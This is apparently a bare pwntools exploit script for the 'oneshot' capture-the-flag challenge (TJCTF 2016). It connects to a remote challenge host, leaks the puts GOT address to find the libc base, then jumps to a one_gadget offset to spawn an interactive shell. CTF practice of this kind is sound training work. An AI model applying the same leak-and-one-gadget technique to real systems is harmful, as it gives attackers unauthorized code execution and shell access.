exp
from pwn import *
#context.log_level ='debug'
elf = ELF('./oneshot_tjctf_2016')
#io = process('./oneshot_tjctf_2016')
io = remote('node3.buuoj.cn','26930')
puts_got = elf.got['puts']
libc = ELF('./libc/libc-2.23.so')
one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
io.sendlineafter('Read location?',str(puts_got))
io.recvuntil('0x0000')
puts_addr = int(io.recvuntil('\n'),16)
print 'puts_addr' + hex(puts_addr)
libcbase = puts_addr - libc.symbols['puts']
onegadget = libcbase + one_gadget[0]
io.sendline(str(onegadget))
io.interactive()